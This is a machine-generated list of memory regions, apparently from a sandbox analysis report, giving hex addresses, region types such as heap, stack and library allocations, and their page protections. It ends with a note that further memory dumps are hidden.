page read and write
|
||
8060000
|
heap
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
6026000
|
trusted library allocation
|
page read and write
|
||
8E7517B000
|
stack
|
page read and write
|
||
7C00000
|
trusted library allocation
|
page read and write
|
||
22A20000
|
heap
|
page read and write
|
||
2216E0B0000
|
heap
|
page read and write
|
||
3540000
|
trusted library allocation
|
page read and write
|
||
7BD000
|
trusted library allocation
|
page execute and read and write
|
||
C31000
|
unkown
|
page execute read
|
||
2DD0000
|
heap
|
page read and write
|
||
88FF000
|
heap
|
page read and write
|
||
5D5B000
|
heap
|
page read and write
|
||
9460000
|
direct allocation
|
page execute and read and write
|
||
2027D000
|
stack
|
page read and write
|
||
51AE000
|
stack
|
page read and write
|
||
207A2000
|
trusted library allocation
|
page read and write
|
||
808A000
|
heap
|
page read and write
|
||
A60000
|
heap
|
page read and write
|
||
69E5000
|
heap
|
page execute and read and write
|
||
808D000
|
heap
|
page read and write
|
||
2A72000
|
heap
|
page read and write
|
||
6AAD000
|
stack
|
page read and write
|
||
8091000
|
heap
|
page read and write
|
||
C30000
|
unkown
|
page readonly
|
||
4C91000
|
heap
|
page read and write
|
||
6E20000
|
heap
|
page read and write
|
||
C4D000
|
unkown
|
page readonly
|
||
5496000
|
trusted library allocation
|
page read and write
|
||
4F00000
|
direct allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
7F720000
|
trusted library allocation
|
page execute and read and write
|
||
22E20000
|
trusted library allocation
|
page read and write
|
||
2A9A000
|
heap
|
page read and write
|
||
7BB0000
|
trusted library allocation
|
page read and write
|
||
22E70000
|
trusted library allocation
|
page read and write
|
||
2AE0000
|
heap
|
page read and write
|
||
8E756FE000
|
stack
|
page read and write
|
||
4CC9000
|
trusted library allocation
|
page read and write
|
||
800B000
|
heap
|
page read and write
|
||
8E74977000
|
stack
|
page read and write
|
||
4CB7000
|
trusted library allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
23750000
|
trusted library allocation
|
page read and write
|
||
47C000
|
stack
|
page read and write
|
||
480C000
|
trusted library allocation
|
page read and write
|
||
32D0000
|
trusted library section
|
page read and write
|
||
7910000
|
heap
|
page execute and read and write
|
||
31EF000
|
stack
|
page read and write
|
||
4DCE000
|
stack
|
page read and write
|
||
2AD3000
|
heap
|
page read and write
|
||
3345000
|
trusted library allocation
|
page execute and read and write
|
||
21BD8C8B000
|
heap
|
page read and write
|
||
691F000
|
stack
|
page read and write
|
||
2A9A000
|
heap
|
page read and write
|
||
6F30000
|
trusted library allocation
|
page read and write
|
||
23550000
|
trusted library allocation
|
page read and write
|
||
2AB6000
|
heap
|
page read and write
|
||
203DE000
|
stack
|
page read and write
|
||
207B1000
|
trusted library allocation
|
page read and write
|
||
8060000
|
heap
|
page read and write
|
||
2A77000
|
heap
|
page read and write
|
||
7CD0000
|
trusted library allocation
|
page read and write
|
||
31BB000
|
heap
|
page read and write
|
||
7170000
|
trusted library allocation
|
page read and write
|
||
5D57000
|
heap
|
page read and write
|
||
8B9C000
|
stack
|
page read and write
|
||
23750000
|
trusted library allocation
|
page read and write
|
||
2032E000
|
stack
|
page read and write
|
||
7FF7000
|
heap
|
page read and write
|
||
A5E000
|
stack
|
page read and write
|
||
4B40000
|
heap
|
page read and write
|
||
2ABA000
|
heap
|
page read and write
|
||
5D4C000
|
heap
|
page read and write
|
||
4CC1000
|
heap
|
page read and write
|
||
21859000
|
trusted library allocation
|
page read and write
|
||
4D16000
|
heap
|
page read and write
|
||
22E30000
|
trusted library allocation
|
page read and write
|
||
8060000
|
heap
|
page read and write
|
||
8E75AFE000
|
stack
|
page read and write
|
||
2DDC000
|
stack
|
page read and write
|
||
80B3000
|
heap
|
page read and write
|
||
506F000
|
stack
|
page read and write
|
||
337D000
|
heap
|
page read and write
|
||
21BD9A70000
|
trusted library section
|
page readonly
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
2086D000
|
trusted library allocation
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
2B1E000
|
stack
|
page read and write
|
||
8091000
|
heap
|
page read and write
|
||
8007000
|
heap
|
page read and write
|
||
4EA0000
|
direct allocation
|
page read and write
|
||
6CDE000
|
stack
|
page read and write
|
||
88B4000
|
heap
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
5A0E000
|
stack
|
page read and write
|
||
22D5D000
|
stack
|
page read and write
|
||
22B20000
|
trusted library allocation
|
page read and write
|
||
6BB0000
|
heap
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
22930000
|
heap
|
page read and write
|
||
2AE4000
|
heap
|
page read and write
|
||
6B9000
|
heap
|
page read and write
|
||
2A8D000
|
heap
|
page read and write
|
||
4D6E000
|
stack
|
page read and write
|
||
21BDE0E0000
|
trusted library allocation
|
page read and write
|
||
22E77000
|
trusted library allocation
|
page read and write
|
||
21BD9FA0000
|
trusted library allocation
|
page read and write
|
||
760000
|
heap
|
page read and write
|
||
23750000
|
trusted library allocation
|
page read and write
|
||
207AA000
|
trusted library allocation
|
page read and write
|
||
2216E0E8000
|
heap
|
page read and write
|
||
2061E000
|
stack
|
page read and write
|
||
5D48000
|
heap
|
page read and write
|
||
2D70000
|
heap
|
page read and write
|
||
4CBD000
|
heap
|
page read and write
|
||
884C000
|
stack
|
page read and write
|
||
21BD93E0000
|
trusted library allocation
|
page read and write
|
||
2BEA000
|
heap
|
page read and write
|
||
8770000
|
trusted library allocation
|
page execute and read and write
|
||
2288C000
|
stack
|
page read and write
|
||
742E000
|
stack
|
page read and write
|
||
2A6E000
|
heap
|
page read and write
|
||
8CBC000
|
stack
|
page read and write
|
||
436E000
|
stack
|
page read and write
|
||
7BA0000
|
trusted library allocation
|
page execute and read and write
|
||
8D30000
|
direct allocation
|
page read and write
|
||
80B3000
|
heap
|
page read and write
|
||
7AFE000
|
stack
|
page read and write
|
||
4872000
|
trusted library allocation
|
page read and write
|
||
8008000
|
heap
|
page read and write
|
||
22E43000
|
trusted library allocation
|
page read and write
|
||
21BD9A90000
|
trusted library section
|
page readonly
|
||
31EE000
|
stack
|
page read and write
|
||
4900000
|
heap
|
page read and write
|
||
6F5A000
|
trusted library allocation
|
page read and write
|
||
5D62000
|
heap
|
page read and write
|
||
22E80000
|
trusted library allocation
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
2078D000
|
stack
|
page read and write
|
||
29BD000
|
trusted library allocation
|
page execute and read and write
|
||
356B000
|
heap
|
page read and write
|
||
8E74F7C000
|
stack
|
page read and write
|
||
C37000
|
unkown
|
page readonly
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
22A21000
|
heap
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
4B97000
|
heap
|
page read and write
|
||
2AA3000
|
heap
|
page read and write
|
||
21BD8B70000
|
trusted library section
|
page read and write
|
||
80B3000
|
heap
|
page read and write
|
||
4CBD000
|
heap
|
page read and write
|
||
23750000
|
trusted library allocation
|
page read and write
|
||
6F40000
|
trusted library allocation
|
page read and write
|
||
4ED0000
|
heap
|
page read and write
|
||
2AB8000
|
heap
|
page read and write
|
||
7A50000
|
trusted library allocation
|
page read and write
|
||
4E70000
|
direct allocation
|
page read and write
|
||
8015000
|
heap
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
21BD8CAA000
|
heap
|
page read and write
|
||
21BDE040000
|
trusted library allocation
|
page read and write
|
||
21BD9A50000
|
trusted library section
|
page readonly
|
||
7920000
|
trusted library allocation
|
page read and write
|
||
44E6000
|
trusted library allocation
|
page read and write
|
||
C30000
|
unkown
|
page readonly
|
||
2A7A000
|
heap
|
page read and write
|
||
229A3000
|
heap
|
page read and write
|
||
201BE000
|
stack
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
58CF000
|
stack
|
page read and write
|
||
3037000
|
stack
|
page read and write
|
||
8CC0000
|
direct allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
893C000
|
stack
|
page read and write
|
||
5D62000
|
heap
|
page read and write
|
||
6B0000
|
heap
|
page read and write
|
||
22E70000
|
trusted library allocation
|
page read and write
|
||
4C1F000
|
stack
|
page read and write
|
||
2216DFD0000
|
heap
|
page read and write
|
||
C00000
|
heap
|
page read and write
|
||
2065E000
|
stack
|
page read and write
|
||
8900000
|
heap
|
page read and write
|
||
29E8000
|
heap
|
page read and write
|
||
8370000
|
trusted library allocation
|
page read and write
|
||
21BD955A000
|
heap
|
page read and write
|
||
8D60000
|
direct allocation
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
2A91000
|
heap
|
page read and write
|
||
21BDE200000
|
heap
|
page read and write
|
||
8C20000
|
trusted library allocation
|
page read and write
|
||
8BE0000
|
trusted library allocation
|
page read and write
|
||
5D5B000
|
heap
|
page read and write
|
||
21BDE284000
|
heap
|
page read and write
|
||
23750000
|
trusted library allocation
|
page read and write
|
||
2DE8000
|
heap
|
page read and write
|
||
5D47000
|
heap
|
page read and write
|
||
7AE000
|
stack
|
page read and write
|
||
4CFE000
|
heap
|
page read and write
|
||
6E39000
|
heap
|
page read and write
|
||
22BC0000
|
trusted library allocation
|
page read and write
|
||
7FC0000
|
heap
|
page read and write
|
||
29DB000
|
trusted library allocation
|
page execute and read and write
|
||
23560000
|
trusted library allocation
|
page read and write
|
||
8E75FFE000
|
stack
|
page read and write
|
||
23750000
|
trusted library allocation
|
page read and write
|
||
229D1000
|
heap
|
page read and write
|
||
8D50000
|
direct allocation
|
page read and write
|
||
205A8000
|
stack
|
page read and write
|
||
5D5E000
|
heap
|
page read and write
|
||
8E74A7E000
|
unkown
|
page readonly
|
||
21BDE2F3000
|
heap
|
page read and write
|
||
6E88000
|
heap
|
page read and write
|
||
88A9000
|
heap
|
page read and write
|
||
20520000
|
direct allocation
|
page read and write
|
||
550000
|
heap
|
page read and write
|
||
20861000
|
trusted library allocation
|
page read and write
|
||
7590000
|
heap
|
page read and write
|
||
8A9B000
|
stack
|
page read and write
|
||
2A9F000
|
heap
|
page read and write
|
||
2AD3000
|
heap
|
page read and write
|
||
7812000
|
heap
|
page read and write
|
||
315E000
|
stack
|
page read and write
|
||
2A72000
|
heap
|
page read and write
|
||
7FD0000
|
heap
|
page read and write
|
||
875E000
|
stack
|
page read and write
|
||
22E7E000
|
trusted library allocation
|
page read and write
|
||
22E70000
|
trusted library allocation
|
page read and write
|
||
3390000
|
heap
|
page read and write
|
||
22EB0000
|
trusted library allocation
|
page read and write
|
||
22910000
|
heap
|
page read and write
|
||
23750000
|
trusted library allocation
|
page read and write
|
||
4E80000
|
heap
|
page read and write
|
||
294D000
|
stack
|
page read and write
|
||
2085F000
|
trusted library allocation
|
page read and write
|
||
2ABF000
|
heap
|
page read and write
|
||
77AE000
|
stack
|
page read and write
|
||
7BBD000
|
stack
|
page read and write
|
||
89D0000
|
heap
|
page read and write
|
||
5D5B000
|
heap
|
page read and write
|
||
80FE000
|
stack
|
page read and write
|
||
7C50000
|
trusted library allocation
|
page read and write
|
||
2900000
|
heap
|
page readonly
|
||
22E30000
|
trusted library allocation
|
page read and write
|
||
808D000
|
heap
|
page read and write
|
||
728F000
|
stack
|
page read and write
|
||
2216E0E0000
|
heap
|
page read and write
|
||
2A93000
|
heap
|
page read and write
|
||
69DE000
|
stack
|
page read and write
|
||
7FFF000
|
heap
|
page read and write
|
||
770000
|
heap
|
page read and write
|
||
22E8D000
|
stack
|
page read and write
|
||
3313000
|
trusted library allocation
|
page execute and read and write
|
||
2BE0000
|
heap
|
page read and write
|
||
494D000
|
trusted library allocation
|
page read and write
|
||
7BF0000
|
trusted library allocation
|
page read and write
|
||
2D90000
|
heap
|
page read and write
|
||
6E29A7C000
|
stack
|
page read and write
|
||
2A9A000
|
heap
|
page read and write
|
||
21BD93F0000
|
trusted library allocation
|
page read and write
|
||
8D00000
|
direct allocation
|
page read and write
|
||
8015000
|
heap
|
page read and write
|
||
88FF000
|
heap
|
page read and write
|
||
2CF0000
|
heap
|
page read and write
|
||
6FA0000
|
heap
|
page execute and read and write
|
||
C10000
|
heap
|
page read and write
|
||
4DE0000
|
heap
|
page read and write
|
||
21BD8C5B000
|
heap
|
page read and write
|
||
68E000
|
stack
|
page read and write
|
||
21BDE010000
|
trusted library allocation
|
page read and write
|
||
8BF0000
|
trusted library allocation
|
page read and write
|
||
23750000
|
trusted library allocation
|
page read and write
|
||
523F000
|
stack
|
page read and write
|
||
8E7587E000
|
stack
|
page read and write
|
||
6A6E000
|
stack
|
page read and write
|
||
22EA0000
|
trusted library allocation
|
page read and write
|
||
23550000
|
trusted library allocation
|
page read and write
|
||
7FDE000
|
stack
|
page read and write
|
||
2AE6000
|
heap
|
page read and write
|
||
29AD000
|
trusted library allocation
|
page execute and read and write
|
||
5D62000
|
heap
|
page read and write
|
||
22E60000
|
trusted library allocation
|
page read and write
|
||
303E000
|
stack
|
page read and write
|
||
21BD9691000
|
trusted library allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
22E70000
|
trusted library allocation
|
page read and write
|
||
530000
|
heap
|
page read and write
|
||
7CF7000
|
trusted library allocation
|
page read and write
|
||
21BD9A80000
|
trusted library section
|
page readonly
|
||
4E0F000
|
stack
|
page read and write
|
||
5D60000
|
heap
|
page read and write
|
||
4CC1000
|
heap
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
5D62000
|
heap
|
page read and write
|
||
80BA000
|
heap
|
page read and write
|
||
7FDC000
|
heap
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
88BE000
|
heap
|
page read and write
|
||
4930000
|
trusted library allocation
|
page read and write
|
||
2A2F000
|
heap
|
page read and write
|
||
43EE000
|
stack
|
page read and write
|
||
2AB2000
|
heap
|
page read and write
|
||
34EE000
|
stack
|
page read and write
|
||
8E7557E000
|
unkown
|
page readonly
|
||
5D48000
|
heap
|
page read and write
|
||
486E000
|
trusted library allocation
|
page read and write
|
||
22800000
|
trusted library allocation
|
page read and write
|
||
23750000
|
trusted library allocation
|
page read and write
|
||
5D4E000
|
heap
|
page read and write
|
||
23790000
|
trusted library allocation
|
page read and write
|
||
7BC0000
|
trusted library allocation
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
5D65000
|
heap
|
page read and write
|
||
21BD9513000
|
heap
|
page read and write
|
||
3314000
|
trusted library allocation
|
page read and write
|
||
8055000
|
heap
|
page read and write
|
||
22E60000
|
trusted library allocation
|
page read and write
|
||
495E000
|
trusted library allocation
|
page read and write
|
||
29A0000
|
trusted library allocation
|
page read and write
|
||
7C9F000
|
stack
|
page read and write
|
||
7FC9000
|
heap
|
page read and write
|
||
23780000
|
trusted library allocation
|
page read and write
|
||
207B6000
|
trusted library allocation
|
page read and write
|
||
2E1D000
|
heap
|
page read and write
|
||
7160000
|
trusted library allocation
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
88F7000
|
heap
|
page read and write
|
||
2B8B000
|
heap
|
page read and write
|
||
88A9000
|
heap
|
page read and write
|
||
21BDE253000
|
heap
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
3090000
|
heap
|
page read and write
|
||
835E000
|
stack
|
page read and write
|
||
21BDE160000
|
trusted library allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
2AA3000
|
heap
|
page read and write
|
||
4CBD000
|
heap
|
page read and write
|
||
8E7537E000
|
unkown
|
page readonly
|
||
86A0000
|
trusted library allocation
|
page read and write
|
||
2990000
|
trusted library allocation
|
page read and write
|
||
2A74000
|
heap
|
page read and write
|
||
2A9A000
|
heap
|
page read and write
|
||
2A9F000
|
heap
|
page read and write
|
||
21BD951A000
|
heap
|
page read and write
|
||
2BB0000
|
heap
|
page read and write
|
||
76B000
|
stack
|
page read and write
|
||
23480000
|
trusted library allocation
|
page read and write
|
||
21BDE2F1000
|
heap
|
page read and write
|
||
21BD8A50000
|
heap
|
page read and write
|
||
2216E370000
|
heap
|
page read and write
|
||
69E0000
|
heap
|
page execute and read and write
|
||
2AC1000
|
heap
|
page read and write
|
||
21BDE2E8000
|
heap
|
page read and write
|
||
2A98000
|
heap
|
page read and write
|
||
C37000
|
unkown
|
page readonly
|
||
7B0000
|
trusted library allocation
|
page read and write
|
||
21BDE083000
|
trusted library allocation
|
page read and write
|
||
23750000
|
trusted library allocation
|
page read and write
|
||
4C8C000
|
stack
|
page read and write
|
||
805C000
|
stack
|
page read and write
|
||
B9E000
|
stack
|
page read and write
|
||
7A60000
|
trusted library allocation
|
page read and write
|
||
22E41000
|
trusted library allocation
|
page read and write
|
||
22E80000
|
trusted library allocation
|
page read and write
|
||
22E60000
|
trusted library allocation
|
page read and write
|
||
5B10000
|
trusted library allocation
|
page read and write
|
||
7140000
|
trusted library allocation
|
page read and write
|
||
22E20000
|
trusted library allocation
|
page read and write
|
||
207E0000
|
heap
|
page execute and read and write
|
||
2AB2000
|
heap
|
page read and write
|
||
64E000
|
stack
|
page read and write
|
||
33B4000
|
heap
|
page read and write
|
||
8E74E7E000
|
unkown
|
page readonly
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
47D0000
|
heap
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
7C5E000
|
stack
|
page read and write
|
||
7C20000
|
trusted library allocation
|
page read and write
|
||
7587000
|
heap
|
page read and write
|
||
808A000
|
heap
|
page read and write
|
||
2AB9000
|
heap
|
page read and write
|
||
8E7627E000
|
unkown
|
page readonly
|
||
809D000
|
heap
|
page read and write
|
||
5D62000
|
heap
|
page read and write
|
||
7CE0000
|
trusted library allocation
|
page read and write
|
||
29B0000
|
heap
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
2A2B000
|
heap
|
page read and write
|
||
7FE4000
|
heap
|
page read and write
|
||
8E7547E000
|
unkown
|
page readonly
|
||
2A86000
|
heap
|
page read and write
|
||
8E74C7E000
|
unkown
|
page readonly
|
||
2D3E000
|
unkown
|
page read and write
|
||
4C40000
|
heap
|
page readonly
|
||
2ACD000
|
heap
|
page read and write
|
||
4F87000
|
heap
|
page read and write
|
||
7C9000
|
trusted library allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
4D4C000
|
heap
|
page read and write
|
||
217F1000
|
trusted library allocation
|
page read and write
|
||
21BD9A60000
|
trusted library section
|
page readonly
|
||
89C0000
|
trusted library allocation
|
page execute and read and write
|
||
21BDE1B0000
|
remote allocation
|
page read and write
|
||
21BDE24E000
|
heap
|
page read and write
|
||
4F80000
|
heap
|
page read and write
|
||
4FED000
|
trusted library allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
23560000
|
trusted library allocation
|
page read and write
|
||
7C10000
|
heap
|
page read and write
|
||
70E0000
|
trusted library allocation
|
page read and write
|
||
2A83000
|
heap
|
page read and write
|
||
201FD000
|
stack
|
page read and write
|
||
2AB2000
|
heap
|
page read and write
|
||
808A000
|
heap
|
page read and write
|
||
530000
|
heap
|
page read and write
|
||
7D0000
|
trusted library allocation
|
page read and write
|
||
5D5C000
|
heap
|
page read and write
|
||
6FC0000
|
trusted library allocation
|
page execute and read and write
|
||
2A78000
|
heap
|
page read and write
|
||
21BD8C2B000
|
heap
|
page read and write
|
||
4D60000
|
heap
|
page read and write
|
||
22920000
|
heap
|
page read and write
|
||
22E60000
|
trusted library allocation
|
page read and write
|
||
8380000
|
trusted library allocation
|
page read and write
|
||
2A6E000
|
heap
|
page read and write
|
||
8D40000
|
direct allocation
|
page read and write
|
||
5D56000
|
heap
|
page read and write
|
||
21BD8C43000
|
heap
|
page read and write
|
||
49D9000
|
trusted library allocation
|
page read and write
|
||
794C000
|
heap
|
page read and write
|
||
20480000
|
remote allocation
|
page read and write
|
||
2A91000
|
heap
|
page read and write
|
||
21BD8CBA000
|
heap
|
page read and write
|
||
207BD000
|
trusted library allocation
|
page read and write
|
||
2ABD000
|
stack
|
page read and write
|
||
2A4D000
|
heap
|
page read and write
|
||
333A000
|
trusted library allocation
|
page execute and read and write
|
||
33A4000
|
heap
|
page read and write
|
||
4CC1000
|
heap
|
page read and write
|
||
21BDE1B0000
|
remote allocation
|
page read and write
|
||
2A74000
|
heap
|
page read and write
|
||
2A7F000
|
heap
|
page read and write
|
||
8065000
|
heap
|
page read and write
|
||
C35000
|
unkown
|
page readonly
|
||
87E0000
|
trusted library allocation
|
page read and write
|
||
6F95000
|
trusted library allocation
|
page read and write
|
||
70E7000
|
trusted library allocation
|
page read and write
|
||
8CD0000
|
direct allocation
|
page read and write
|
||
21BDE0F0000
|
trusted library allocation
|
page read and write
|
||
7FE4000
|
heap
|
page read and write
|
||
8E7577E000
|
unkown
|
page readonly
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
2298B000
|
heap
|
page read and write
|
||
21BDE170000
|
trusted library allocation
|
page read and write
|
||
4974000
|
heap
|
page read and write
|
||
87C0000
|
trusted library allocation
|
page read and write
|
||
22E30000
|
trusted library allocation
|
page read and write
|
||
80B3000
|
heap
|
page read and write
|
||
22E90000
|
trusted library allocation
|
page execute and read and write
|
||
21819000
|
trusted library allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
28BE000
|
stack
|
page read and write
|
||
30C1000
|
heap
|
page read and write
|
||
2AAA000
|
heap
|
page read and write
|
||
2A11000
|
heap
|
page read and write
|
||
2ABB000
|
heap
|
page read and write
|
||
20790000
|
trusted library allocation
|
page read and write
|
||
20660000
|
heap
|
page read and write
|
||
22E90000
|
trusted library allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
1CA000
|
stack
|
page read and write
|
||
8677000
|
stack
|
page read and write
|
||
22E51000
|
trusted library allocation
|
page read and write
|
||
8E75C7C000
|
stack
|
page read and write
|
||
85F0000
|
trusted library allocation
|
page read and write
|
||
496B000
|
trusted library allocation
|
page read and write
|
||
51FE000
|
stack
|
page read and write
|
||
4D29000
|
stack
|
page read and write
|
||
4CB6000
|
heap
|
page read and write
|
||
690000
|
heap
|
page read and write
|
||
7107000
|
trusted library allocation
|
page read and write
|
||
8D90000
|
direct allocation
|
page read and write
|
||
7A0B000
|
heap
|
page read and write
|
||
2A93000
|
heap
|
page read and write
|
||
8360000
|
trusted library allocation
|
page read and write
|
||
8E758FE000
|
stack
|
page read and write
|
||
2A23000
|
heap
|
page read and write
|
||
3280000
|
heap
|
page read and write
|
||
21BDE050000
|
trusted library allocation
|
page read and write
|
||
47F9000
|
trusted library allocation
|
page read and write
|
||
2A2B000
|
heap
|
page read and write
|
||
3239000
|
heap
|
page read and write
|
||
5D5B000
|
heap
|
page read and write
|
||
8003000
|
heap
|
page read and write
|
||
21BDE030000
|
trusted library allocation
|
page read and write
|
||
21BD8C59000
|
heap
|
page read and write
|
||
7A9000
|
stack
|
page read and write
|
||
4C20000
|
heap
|
page read and write
|
||
800B000
|
heap
|
page read and write
|
||
808A000
|
heap
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
205B0000
|
trusted library allocation
|
page read and write
|
||
21BDE21F000
|
heap
|
page read and write
|
||
5D64000
|
heap
|
page read and write
|
||
2CFD000
|
stack
|
page read and write
|
||
4CBB000
|
heap
|
page read and write
|
||
22EB0000
|
trusted library allocation
|
page execute and read and write
|
||
29CA000
|
trusted library allocation
|
page execute and read and write
|
||
2A9F000
|
heap
|
page read and write
|
||
7C80000
|
trusted library allocation
|
page read and write
|
||
590D000
|
stack
|
page read and write
|
||
4E91000
|
trusted library allocation
|
page read and write
|
||
4F6E000
|
stack
|
page read and write
|
||
C35000
|
unkown
|
page readonly
|
||
22EA0000
|
trusted library allocation
|
page read and write
|
||
8680000
|
heap
|
page read and write
|
||
8057000
|
heap
|
page read and write
|
||
5675000
|
trusted library allocation
|
page read and write
|
||
2918000
|
trusted library allocation
|
page read and write
|
||
5D32000
|
heap
|
page read and write
|
||
8C00000
|
trusted library allocation
|
page read and write
|
||
C4D000
|
unkown
|
page readonly
|
||
32E0000
|
trusted library section
|
page read and write
|
||
563E000
|
stack
|
page read and write
|
||
44D0000
|
heap
|
page read and write
|
||
5D32000
|
heap
|
page read and write
|
||
7AB5000
|
trusted library allocation
|
page read and write
|
||
21BD9A40000
|
trusted library section
|
page readonly
|
||
22E30000
|
trusted library allocation
|
page read and write
|
||
7B7E000
|
stack
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
2AAE000
|
heap
|
page read and write
|
||
6EAF000
|
heap
|
page read and write
|
||
C30000
|
unkown
|
page readonly
|
||
540000
|
heap
|
page read and write
|
||
516C000
|
stack
|
page read and write
|
||
21BDE050000
|
trusted library allocation
|
page read and write
|
||
23760000
|
trusted library allocation
|
page read and write
|
||
4D8E000
|
stack
|
page read and write
|
||
3470000
|
heap
|
page readonly
|
||
352E000
|
stack
|
page read and write
|
||
305F000
|
unkown
|
page read and write
|
||
6039000
|
trusted library allocation
|
page read and write
|
||
6EAC000
|
heap
|
page read and write
|
||
21BD9940000
|
trusted library allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
322D000
|
stack
|
page read and write
|
||
7927000
|
trusted library allocation
|
page read and write
|
||
2AC0000
|
trusted library allocation
|
page read and write
|
||
3370000
|
heap
|
page read and write
|
||
5689000
|
trusted library allocation
|
page read and write
|
||
2ACC000
|
heap
|
page read and write
|
||
22E60000
|
trusted library allocation
|
page read and write
|
||
3560000
|
heap
|
page read and write
|
||
6FE000
|
stack
|
page read and write
|
||
4D4E000
|
stack
|
page read and write
|
||
720F000
|
stack
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
229D6000
|
heap
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
315F000
|
stack
|
page read and write
|
||
20380000
|
heap
|
page read and write
|
||
5EFA000
|
trusted library allocation
|
page read and write
|
||
23550000
|
trusted library allocation
|
page read and write
|
||
29C0000
|
heap
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
2AA9000
|
heap
|
page read and write
|
||
2870000
|
trusted library allocation
|
page read and write
|
||
897D000
|
stack
|
page read and write
|
||
21BDE241000
|
heap
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
21BD8C74000
|
heap
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
2023C000
|
stack
|
page read and write
|
||
30B8000
|
heap
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
30C3000
|
heap
|
page read and write
|
||
4C50000
|
heap
|
page read and write
|
||
8142000
|
heap
|
page read and write
|
||
7C00000
|
trusted library allocation
|
page execute and read and write
|
||
2A9A000
|
heap
|
page read and write
|
||
2A9F000
|
heap
|
page read and write
|
||
229DC000
|
heap
|
page read and write
|
||
489B000
|
stack
|
page read and write
|
||
2A91000
|
heap
|
page read and write
|
||
C4D000
|
unkown
|
page readonly
|
||
4912000
|
trusted library allocation
|
page read and write
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
5D64000
|
heap
|
page read and write
|
||
29CE000
|
heap
|
page read and write
|
||
4D4C000
|
stack
|
page read and write
|
||
C31000
|
unkown
|
page execute read
|
||
22E40000
|
trusted library allocation
|
page read and write
|
||
4CC4000
|
heap
|
page read and write
|
||
5D53000
|
heap
|
page read and write
|
||
8017000
|
heap
|
page read and write
|
||
5D53000
|
heap
|
page read and write
|
||
2A98000
|
heap
|
page read and write
|
||
2A88000
|
heap
|
page read and write
|
||
21BDE140000
|
trusted library allocation
|
page read and write
|
||
21BD8C79000
|
heap
|
page read and write
|
||
A10000
|
heap
|
page read and write
|
||
89D6000
|
heap
|
page read and write
|
||
2B4D000
|
stack
|
page read and write
|
||
47D6000
|
heap
|
page read and write
|
||
8690000
|
trusted library allocation
|
page execute and read and write
|
||
2E30000
|
heap
|
page read and write
|
||
21BD9B80000
|
trusted library allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
8A05000
|
heap
|
page read and write
|
||
3310000
|
trusted library allocation
|
page read and write
|
||
22E30000
|
trusted library allocation
|
page read and write
|
||
B99000
|
stack
|
page read and write
|
||
8E75A7E000
|
unkown
|
page readonly
|
||
8CF0000
|
direct allocation
|
page read and write
|
||
8091000
|
heap
|
page read and write
|
||
7FC1000
|
heap
|
page read and write
|
||
2A8D000
|
heap
|
page read and write
|
||
C37000
|
unkown
|
page readonly
|
||
21BDDFF0000
|
trusted library allocation
|
page read and write
|
||
6D1F000
|
stack
|
page read and write
|
||
2AA3000
|
heap
|
page read and write
|
||
7C0000
|
trusted library allocation
|
page read and write
|
||
22E50000
|
trusted library allocation
|
page read and write
|
||
4CEB000
|
stack
|
page read and write
|
||
5D6D000
|
heap
|
page read and write
|
There are 1216 hidden memdumps, click here to show them.